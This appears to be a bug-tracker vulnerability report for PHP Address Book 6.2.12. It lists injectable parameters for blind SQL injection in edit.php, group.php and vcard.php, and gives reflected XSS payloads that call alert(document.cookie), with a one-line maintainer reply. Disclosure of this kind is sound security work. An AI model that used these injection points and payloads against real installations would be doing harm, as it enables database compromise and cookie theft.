#7 PHP Address Book 6.2.12 Multiple security vulnerabilities

[Anonymous]

Hi,

I`ve found some xss and sql-injection vulnerabilities in PHP Address Book 6.2.12:

// (Blind) SQL-Injection
http://[target]/addressbookv6.2.12/edit.php?id=[sql-injection]
http://[target]/addressbookv6.2.12/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
http://[target]/addressbookv6.2.12/vcard.php?id=[sql-injection]

// XSS
http://[target]/addressbookv6.2.12/preferences.php?from='"<script>alert(document.cookie)</script>
http://[target]/addressbookv6.2.12/index.php?group='"<script>alert(document.cookie)</script>

Best regards,
sschurtz

[chatelao]

See v7.0.0 Bugs.